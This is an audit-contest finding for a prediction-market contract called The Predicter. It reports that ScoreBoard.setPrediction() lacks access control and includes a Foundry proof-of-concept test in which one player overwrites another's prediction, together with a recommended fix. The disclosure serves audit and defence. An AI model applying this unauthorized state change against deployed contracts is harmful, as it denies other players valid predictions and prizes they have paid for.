First Flight #20: The Predicter

First Flight #20

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Players can change prediction of other Players

strapontin

Description

A Player can call ScoreBoard.setPrediction() to set the prediction of another Player.

Impact

This denies other Players from making valid predictions and receiving their prize while they still pay their prediction fee.

PoC

Add the following getter at the end of ScoreBoard.sol :

function getPlayerPrediction(address player, uint256 matchNumber) external view returns (Result) {

return playersPredictions[player].predictions[matchNumber];

}

Add the following function at the end of the test file and run it :

forge test --mt test_playerCanChangeOtherPlayerPrediction

// ScoreBoard.setPrediction() can be used to change prediction of other players

function test_playerCanChangeOtherPlayerPrediction() public {

uint8 MATCH_NUMBER = 0;

vm.deal(organizer, 1 ether);

vm.deal(stranger, 1 ether);

vm.warp(1);

vm.prank(stranger);

thePredicter.register{value: 0.04 ether}();

vm.warp(2);

// The organizer approves the Player and makes his prediction

// on the first match

vm.startPrank(organizer);

thePredicter.makePrediction{value: 0.0001 ether}(MATCH_NUMBER, ScoreBoard.Result.First);

thePredicter.approvePlayer(stranger);

vm.stopPrank();

assert(ScoreBoard.Result.First == scoreBoard.getPlayerPrediction(organizer, MATCH_NUMBER));

// Player deletes the prediction of another user

vm.prank(stranger);

scoreBoard.setPrediction(organizer, MATCH_NUMBER, ScoreBoard.Result.Pending);

// The organizer has his prediction reset

assert(ScoreBoard.Result.Pending == scoreBoard.getPlayerPrediction(organizer, MATCH_NUMBER));

}

Recommendations

Add the following require (or equivalent revert) at the beginning of the setPrediction function of the ScoreBoard.sol file :

require(msg.sender == thePredicter || msg.sender == player);

This forces the caller of this function to be either ThePredicter (trusted) or the same person changing the prediction, preventing the caller from changing another Player prediction.

Updates

Lead Judging Commences

NightHawK Lead Judge 10 months ago

Submission Judgement Published

Validated

Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Rewards breakdown

nSLOC

191

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.